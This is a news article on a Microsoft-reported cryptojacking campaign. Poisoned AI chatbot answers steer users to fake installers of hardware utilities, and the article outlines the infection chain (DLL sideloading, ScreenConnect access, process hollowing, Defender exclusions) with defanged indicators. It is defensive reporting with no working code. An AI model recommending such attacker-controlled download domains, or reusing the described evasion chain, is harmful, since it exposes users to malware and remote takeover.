Microsoft has warned of an active cryptojacking campaign in which threat actors are exploiting artificial intelligence chatbot interactions to direct users toward malicious download websites hosting malware. According to Microsoft Defender Experts and Microsoft Defender Security Research Team, this emerging delivery method extends traditional social engineering tactics beyond conventional search engine manipulation and introduces malicious software recommendations directly into AI generated responses. Researchers said attackers are impersonating trusted system and hardware monitoring utilities such as CrystalDiskInfo, HWMonitor, Display Driver Uninstaller, FurMark, K Lite Codec Pack, and PDFgear. Microsoft believes the campaign is strategically designed to target users with high performance graphics processing units, enabling threat actors to maximize cryptocurrency mining output rather than infecting systems indiscriminately.
The campaign begins when users search for trusted software recommendations through artificial intelligence chatbots or search engines. Earlier versions of the activity relied on search engine optimization poisoning to push malicious websites into search results. However, Microsoft observed that newer versions detected in April 2026 increasingly relied on large language model based chatbots, where users asking for download recommendations were presented with attacker controlled domains embedded inside chatbot responses. Researchers said this method appears consistent with emerging techniques associated with artificial intelligence search result poisoning. The malicious websites contain download buttons that retrieve ZIP archives hosted on campaign specific subdomains of gleeze[.]com, infrastructure associated with Dynu, a dynamic DNS provider frequently abused by threat actors. Microsoft said investigators identified more than 150 malicious domains involved in distributing fake software installers.
Once downloaded, the ZIP archive includes a legitimate executable bundled with a malicious DLL file named “autorun.dll,” which is sideloaded when users launch the software. The DLL then installs another malicious file called “vcredist_x64.dll” through “msiexec.exe,” ultimately deploying ScreenConnect software to establish persistent remote access with attacker controlled infrastructure located at “193.42.11[.]108.” Microsoft reported that this remote access channel serves as a delivery mechanism for an executable called “SimpleRunPE.exe,” which establishes persistence using Registry Run keys and scheduled tasks while modifying Microsoft Defender exclusions to avoid detection. Researchers explained that the malware employs anti analysis techniques and process hollowing to run cryptocurrency mining operations inside trusted Microsoft signed binaries. In some cases, PowerShell scripts were also observed downloading disguised malware files named “vlc.exe” to evade detection and silently execute malicious activity.
The malware supports multiple cryptocurrency mining programs, including gminer, lolMiner, and SRBMiner MULTI, while continuously monitoring the infected system for analysis tools such as Windows Task Manager, Process Hacker, Process Explorer, and System Informer. If any of these applications are detected, the malware immediately terminates mining operations to avoid exposure. Microsoft stated that beyond financial gain, attackers are also establishing long term access to compromised systems, potentially enabling data theft, lateral movement, or ransomware activity. Separately, Microsoft disclosed additional investigations involving threat actors exploiting trusted relationships, including attacks targeting internet facing F5 BIG IP appliances, Linux systems, vulnerable Atlassian Confluence servers, and third party information technology providers to gain unauthorized access. Researchers advised organizations to adopt stronger validation practices for trusted vendors, software recommendations, and integrated management tools while continuously monitoring environments for suspicious behavior hidden within legitimate services.
Follow the SPIN IDG WhatsApp Channel for updates across the Smart Pakistan Insights Network covering all of Pakistan’s technology ecosystem.
